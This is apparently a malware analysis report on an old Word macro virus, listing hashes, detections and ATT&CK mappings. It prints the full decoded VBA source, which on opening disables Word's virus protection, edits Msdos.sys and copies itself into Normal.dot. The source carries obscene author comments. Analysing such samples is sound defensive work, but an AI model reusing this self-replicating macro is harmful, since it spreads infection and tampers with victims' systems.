Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 12ba4e549e0df448…

MALICIOUS

Office (OLE)

31.0 KB Created: 1999-06-09 02:39:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 5f0b9a68c1608b79ec4425e31dbdfdb0 SHA-1: 3752fc5b6b38cc1c8dc2a7098d3ba7abe93f318e SHA-256: 12ba4e549e0df44857e63d60f6413733f4d4bcf2702b83b0c6d9b527748a9c51
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1505.003 Server Software Component: Web Shell

The sample contains a VBA macro that is automatically executed via the Document_Open event. This macro attempts to modify system files like C:\Msdos.sys and embed itself into the Normal.dot template, likely to achieve persistence. The macro also attempts to write its own code to C:\FF.sys, suggesting it may be a dropper or downloader for further malicious activity.

Heuristics 3

  • ClamAV: Doc.Trojan.Goober-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Goober-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1474 bytes
SHA-256: 7c38872c6c1aee6c65e438083a3e67ba8af5bd8ba16b96bcdb299e9178418c72
Detection
ClamAV: Doc.Trojan.FF-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_Open(): On Error Resume Next: Options.ConfirmConversions = (0 - 0): Options.SaveNormalPrompt = (1 - 1): Options.VirusProtection = (2 - 2): CommandBars("Tools").Controls("Macro").Delete
If Day(1) Then: SetAttr "C:\Msdos.sys", vbNormal: System.PrivateProfileString("C:\Msdos.sys", "Options", "BootGUI") = "0": SetAttr "C:\Msdos.sys", vbSystem + vbHidden + vbReadOnly
Open "C:\FF.sys" For Output As #1: Print #1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(1, MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines): Close #1
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines: ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\FF.sys"): ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("C:\FF.sys"): ActiveDocument.SaveAs FileName = ActiveDocument.FullName: End Sub
'*;*;*;*;*;*;*;*;*;*;*;*;*;*'
'*~FistFuck:~By~Lys~KovicK~*'
'*~Enjoy~The~HandJob~Bitch~*'
'*'*'*'*'*'*'*'*'*'*'*'*'*'*'

Open this report in the interactive analyzer, or submit your own file for analysis.